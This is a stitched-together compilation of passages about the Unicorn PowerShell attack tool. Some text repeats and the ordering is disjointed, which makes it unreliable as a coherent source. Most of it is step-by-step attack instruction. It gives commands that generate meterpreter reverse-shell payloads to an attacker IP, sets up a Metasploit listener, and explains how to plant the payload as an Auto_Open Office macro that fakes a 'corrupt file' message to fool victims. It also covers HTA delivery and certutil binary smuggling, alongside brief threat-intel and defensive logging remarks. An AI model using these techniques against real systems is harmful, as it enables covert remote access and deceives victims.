These files will be saved in the directory where unicorn was cloned. powershell_attack.txt holds the malicious code; when the victim executes that code in a command prompt, the attacker gets a reverse connection from the victim's machine.
The HTA attack will automatically generate two files. index.html tells the browser to use launcher.hta, which contains the malicious PowerShell injection code. All files will be exported to the hta_access/ folder. Three main files:
Unicorn – PowerShell Downgrade Attack
The certutil attack allows you to take a binary file, convert it into base64 format and use certutil on the victim machine to convert it back to a binary for you. It allows you to transfer a binary to the victim machine through a fake certificate file. To get the base64 output, just place an executable in the path of unicorn and run the following:
Usage is simple: just run Magic Unicorn (ensure Metasploit is installed and in the right path) and it will automatically generate a PowerShell command that you simply cut and paste into a command-line window or deliver through a payload delivery system.

Getting Started

Go over to the TrustedSec GitHub Unicorn repository and download the latest version of unicorn by clicking the Download Zip button on the left of the page.
After you run the command it generates two files: powershell_attack.txt and unicorn.rc. The text file contains all of the code needed to inject the PowerShell attack into memory. The rc file can be used with Metasploit to quickly open up a listener on the port you specified in the command:

msfconsole -r unicorn.rc

When the listener is all set up, open up the powershell_attack.txt file, copy it directly into a command prompt, hit enter, and you will shortly receive a session in Metasploit.

Macro Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

Adding macro to the end of the command formats the powershell_attack.txt file to be inserted as a macro into Word or Excel. Open up Word or Excel, go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a Developer tab. Create a new macro, call it Auto_Open and paste the generated code into it. This will run automatically. Note that a message will prompt the user saying that the file is corrupt and automatically close the Excel document. THIS IS NORMAL BEHAVIOR! This tricks the victim into thinking the Excel document is corrupted. You should get a shell through PowerShell injection after that.
The HTA attack will automatically generate two files: the first is index.html, which tells the browser to use Launcher.hta, which in turn contains the malicious PowerShell injection code. All files are exported to the hta_access/ folder and there will be three main files: index.html, Launcher.hta and the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit. A user must click allow and accept when using the HTA attack in order for the PowerShell injection to work properly.

Certutil Attack

python unicorn.py crt

The certutil attack vector was identified by Matthew Graeber (@mattifestation). It allows you to take a binary file, convert it into base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allows you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py crt to get the base64 output. Once that's finished, go to the decode_attack/ folder, which contains the files. The bat file is a command that can be run on a Windows machine to convert it back to a binary.
As you may have noticed, peppered in between the security measures I suggested you take, I also mentioned that there are still ways for an adversary to get around some of those methods. Some of these bypass techniques are PowerShell downgrade attacks, process injection, PowerShell obfuscation, etc. However, the measures are still valuable because not every attacker knows how to execute these bypass attacks, so they will provide protection against less skilled adversaries (which may be the majority of them). Also keep in mind that you can run PowerShell scripts without calling powershell.exe.
Usage is simple: just run Magic Unicorn (ensure Metasploit is installed and in the right path if you are using the Metasploit methods) and it will automatically generate a PowerShell command that you simply cut and paste into a command-line window or deliver through a payload delivery system. Unicorn supports your own shellcode, Cobalt Strike, and Metasploit.
Unicorn, created by TrustedSec, is a simple tool designed to assist penetration testers with PowerShell downgrade attacks and injecting sophisticated shellcode payloads straight into memory. The techniques utilized by Unicorn are based on the work of Matthew Graeber and TrustedSec founder David Kennedy.
When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.
This generates a Macro payload that initiates a reverse HTTPS connection on port 443 to our pentest server at cdn-01.example.com. Using a DNS name instead of an IP address means that we can move our pentest server to another IP address and clients will connect back to us as long as they can resolve our domain. Once the command completes we'll have a text file named "powershell_attack.txt" containing the Macro we need.
In this article we will use Unicorn, a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. It is a simple Python script which generates malware from templates.
Other tools used by UNC3890 include the Metasploit penetration testing software and Unicorn, a publicly available utility for conducting a PowerShell downgrade attack and injecting shellcode into memory.
The second tool is Sugarush, a backdoor used to establish a connection with an embedded C2 and to execute CMD commands. Other tools used by UNC3890 include Unicorn (a tool for conducting a PowerShell downgrade attack and injecting shellcode into memory), Metasploit, and Northstar C2 (an open-source C2 framework developed for penetration testing and red teaming).
Use unicorn (GitHub - trustedsec/unicorn): Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at DEF CON 18. It is specifically created for this purpose.
I would add Windows PowerShell Event Logs to this list as well. Attackers will occasionally try to downgrade from later to earlier versions of PowerShell in order to prevent logging, so you should consider uninstalling PowerShell version 2 and enabling logging on a more recent version (3 and up) where possible. This should effectively reduce your attack surface.